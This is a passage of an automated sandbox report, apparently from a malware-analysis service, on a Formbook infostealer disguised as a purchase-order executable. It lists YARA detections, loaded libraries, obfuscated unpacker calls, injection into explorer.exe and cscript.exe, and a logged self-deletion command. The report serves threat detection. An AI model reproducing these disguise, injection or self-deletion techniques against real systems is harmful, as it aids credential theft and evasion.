          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBDB924_2_02DBDB92
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBDEB94_2_02DBDEB9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DA9E604_2_02DA9E60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DA2FB04_2_02DA2FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DA2D904_2_02DA2D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBDD874_2_02DBDD87
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: String function: 017AEA12 appears 86 times
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: String function: 01775130 appears 58 times
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: String function: 017BF290 appears 103 times
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: String function: 0172B970 appears 262 times
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: String function: 01787E54 appears 107 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04F57E54 appears 97 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04F7EA12 appears 86 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04EFB970 appears 257 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04F45130 appears 57 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04F8F290 appears 103 times
          Source: Purchase Order#23113.exeStatic PE information: invalid certificate
          Source: Purchase Order#23113.exe, 00000000.00000002.1770060059.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000000.00000002.1775578498.0000000007F30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000000.00000000.1739634312.0000000000CFE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeGGj.exeX vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000002.00000002.1819119178.00000000012A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000002.00000002.1819543047.00000000016D0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000002.00000002.1819753451.000000000182D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exeBinary or memory string: OriginalFilenameeGGj.exeX vs Purchase Order#23113.exe
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wininet.dllJump to behavior
          Source: Purchase Order#23113.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4209826259.000000000E656000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: Process Memory Space: Purchase Order#23113.exe PID: 6564, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Purchase Order#23113.exe PID: 6636, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cscript.exe PID: 1068, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Purchase Order#23113.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, lIDZBrdERDDgYaKjKV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, lIDZBrdERDDgYaKjKV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Purchase Order#23113.exe.3121198.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.Purchase Order#23113.exe.3050000.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.Purchase Order#23113.exe.31291b0.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@11/8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070BCDF FormatMessageW,SysAllocString,LocalFree,GetLastError,WideCharToMultiByte,__alloca_probe_16,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,LocalFree,4_2_0070BCDF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_007064E0 CLSIDFromString,CoCreateInstance,4_2_007064E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_007182B5 FindResourceExW,LoadResource,4_2_007182B5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order#23113.exe.logJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
          Source: Purchase Order#23113.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Purchase Order#23113.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Purchase Order#23113.exeReversingLabs: Detection: 31%
          Source: Purchase Order#23113.exeVirustotal: Detection: 39%
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order#23113.exe "C:\Users\user\Desktop\Purchase Order#23113.exe"
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess created: C:\Users\user\Desktop\Purchase Order#23113.exe "C:\Users\user\Desktop\Purchase Order#23113.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Purchase Order#23113.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess created: C:\Users\user\Desktop\Purchase Order#23113.exe "C:\Users\user\Desktop\Purchase Order#23113.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Purchase Order#23113.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Purchase Order#23113.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Purchase Order#23113.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Purchase Order#23113.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: cscript.pdbUGP source: Purchase Order#23113.exe, 00000002.00000002.1819119178.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order#23113.exe, 00000002.00000002.1819543047.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: eGGj.pdb source: Purchase Order#23113.exe
          Source: Binary string: eGGj.pdbSHA256 source: Purchase Order#23113.exe
          Source: Binary string: wntdll.pdbUGP source: Purchase Order#23113.exe, 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1818306118.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1821000587.0000000004D1D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Purchase Order#23113.exe, Purchase Order#23113.exe, 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000003.1818306118.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1821000587.0000000004D1D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cscript.pdb source: Purchase Order#23113.exe, 00000002.00000002.1819119178.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order#23113.exe, 00000002.00000002.1819543047.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, bCOwRu2KKHfkUO1AB6.cs.Net Code: zr2N4DGMKR System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, bCOwRu2KKHfkUO1AB6.cs.Net Code: zr2N4DGMKR System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, -Module-.cs.Net Code: _200E_200E_206B_200B_206D_200F_200F_200C_200E_202B_202C_200D_200F_202C_202E_202B_206F_206D_202E_200B_202D_206B_202E_202C_202C_202B_206A_206C_202A_206B_200D_202C_202B_202B_206E_206E_206C_206E_206C_206F_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, Dill.cs.Net Code: _200D_200B_202A_200F_200E_202D_202C_206D_200E_202E_200B_200F_206C_202D_202A_202C_202E_206B_200B_206A_206E_206C_202D_200F_200D_200D_206D_200D_202A_202B_206E_206F_202A_206D_202E_206D_200E_206C_200D_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: Purchase Order#23113.exeStatic PE information: 0xDB3AE2F9 [Sun Jul 21 05:58:17 2086 UTC]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070AA82 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_0070AA82
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_0142F590 pushfd ; iretd 0_2_0142F599
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B631E7 push ds; iretd 0_2_05B631FF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00417090 pushad ; iretd 2_2_00417096
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041E266 push E89010BFh; ret 2_2_0041E582
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041EA1C push dword ptr [D4EF9124h]; ret 2_2_0041EA3E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041D56C push eax; ret 2_2_0041D572
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041D502 push eax; ret 2_2_0041D508
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041D50B push eax; ret 2_2_0041D572
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00402D89 push ebp; iretd 2_2_00402D8A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0170225F pushad ; ret 2_2_017027F9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017027FA pushad ; ret 2_2_017027F9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017309AD push ecx; mov dword ptr [esp], ecx2_2_017309B6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0170283D push eax; iretd 2_2_01702858
          Source: C:\Windows\explorer.exeCode function: 3_2_0E641B02 push esp; retn 0000h3_2_0E641B03
          Source: C:\Windows\explorer.exeCode function: 3_2_0E641B1E push esp; retn 0000h3_2_0E641B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6419B5 push esp; retn 0000h3_2_0E641AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_0F283B02 push esp; retn 0000h3_2_0F283B03
          Source: C:\Windows\explorer.exeCode function: 3_2_0F283B1E push esp; retn 0000h3_2_0F283B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0F2839B5 push esp; retn 0000h3_2_0F283AE7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070DF11 push ecx; ret 4_2_0070DF24
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F009AD push ecx; mov dword ptr [esp], ecx4_2_04F009B6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBE266 push E89010BFh; ret 4_2_02DBE582
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DB7090 pushad ; iretd 4_2_02DB7096
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBD4B5 push eax; ret 4_2_02DBD508
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBD56C push eax; ret 4_2_02DBD572
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBD50B push eax; ret 4_2_02DBD572
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBD502 push eax; ret 4_2_02DBD508
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBEA1C push dword ptr [D4EF9124h]; ret 4_2_02DBEA3E
